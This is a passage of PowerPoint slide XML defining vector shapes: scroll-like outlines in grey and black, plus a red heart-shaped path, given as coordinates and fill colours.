              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="object 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340171" y="4607617"/>
            <a:ext cx="1435776" cy="1580486"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="724535" h="797560">
                <a:moveTo>
                  <a:pt x="652592" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="214123" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187853" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164936" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148727" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45058" y="660273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22166" y="676482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6076" y="699399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6076" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22166" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45058" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="797215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510013" y="797215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536283" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559200" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575409" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652592" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678862" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701779" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717988" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724137" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717988" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701779" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678862" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652592" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5E5E5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="object 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340171" y="4607617"/>
            <a:ext cx="1435776" cy="1580486"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="724535" h="797560">
                <a:moveTo>
                  <a:pt x="71544" y="797215"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="45058" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22166" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6076" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6076" y="699399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22166" y="676482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45058" y="660273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148727" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164936" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187853" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214123" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652592" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678862" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701779" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717988" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724137" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717988" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701779" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678862" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652592" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575409" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559200" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536283" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510013" y="797215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="797215"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="object 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340170" y="460761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63" name="object 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7775159" y="618741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64" name="object 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6693602" y="4749395"/>
            <a:ext cx="212659" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="107314" h="71755">
                <a:moveTo>
                  <a:pt x="107317" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35772" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="11178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="22637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="48907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="60366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35772" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62042" y="65396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84959" y="49187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101169" y="26270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107317" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B7B7B7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="object 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6693602" y="4749395"/>
            <a:ext cx="212659" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="107314" h="71755">
                <a:moveTo>
                  <a:pt x="107317" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="101169" y="26270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84959" y="49187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62042" y="65396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35772" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="60366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="48907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="22637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="11178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35772" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107317" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="object 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340170" y="460761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67" name="object 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7775159" y="618741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68" name="object 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340171" y="5903864"/>
            <a:ext cx="283128" cy="284387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="142875" h="143510">
                <a:moveTo>
                  <a:pt x="71544" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="45058" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22166" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6076" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6076" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22166" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45058" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97519" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120284" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136438" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84384" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95691" y="60366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103740" y="48907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106806" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103740" y="22637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95691" y="11178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84384" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B7B7B7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="object 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340171" y="5903864"/>
            <a:ext cx="283128" cy="284387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="142875" h="143510">
                <a:moveTo>
                  <a:pt x="142578" y="71544"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="136438" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120284" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97519" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45058" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22166" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6076" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6076" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22166" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45058" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84384" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106806" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84384" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="71544"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="object 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340170" y="460761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71" name="object 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7775159" y="618741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72" name="object 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6764490" y="4607618"/>
            <a:ext cx="142193" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="71754" h="71755">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="71544" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65396" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49187" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26270" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B7B7B7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="object 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6764490" y="4607618"/>
            <a:ext cx="142193" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="71754" h="71755">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="26270" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49187" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65396" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="71544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="object 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340170" y="460761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75" name="object 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7775159" y="618741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76" name="object 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6622712" y="5903866"/>
            <a:ext cx="0" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="71755">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="71544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="object 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340170" y="460761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78" name="object 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7775159" y="618741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79" name="object 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6764489" y="4891171"/>
            <a:ext cx="869517" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="438785">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="438468" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="object 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340170" y="460761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81" name="object 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7775159" y="618741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82" name="object 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6770566" y="5181815"/>
            <a:ext cx="575065" cy="718517"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="290195" h="362585">
                <a:moveTo>
                  <a:pt x="85853" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="77166" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68989" y="1022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31173" y="19930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28106" y="22485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25040" y="26062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21974" y="29129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11753" y="43438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7665" y="51614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6132" y="55702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4599" y="60302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3066" y="64390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2044" y="68989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1533" y="73078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="511" y="77677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="82787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="96585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1022" y="101184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4088" y="115493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144622" y="362324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285157" y="115493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286179" y="110894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287712" y="106295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288734" y="101184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289757" y="91986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289757" y="82787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289245" y="77677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288223" y="73078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287712" y="68989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286179" y="64390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285157" y="60302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283624" y="55702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277492" y="43438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275448" y="39860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="272892" y="36283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144622" y="36283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140534" y="31684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107317" y="5621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90453" y="511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85853" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="290195" h="362585">
                <a:moveTo>
                  <a:pt x="212079" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="203903" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199303" y="511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195215" y="1533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190616" y="2555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186016" y="4088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181928" y="5621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181417" y="7665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173240" y="10220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169152" y="12775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165064" y="15842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160465" y="18908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156887" y="22996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144622" y="36283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="272892" y="36283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270337" y="32706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267271" y="29129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264716" y="26062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261650" y="22485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="258072" y="19930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="255006" y="16864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247852" y="11753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240697" y="7665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="232521" y="4599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228943" y="3066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220767" y="1022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216167" y="511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212079" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="object 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6770566" y="5181815"/>
            <a:ext cx="575065" cy="718517"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
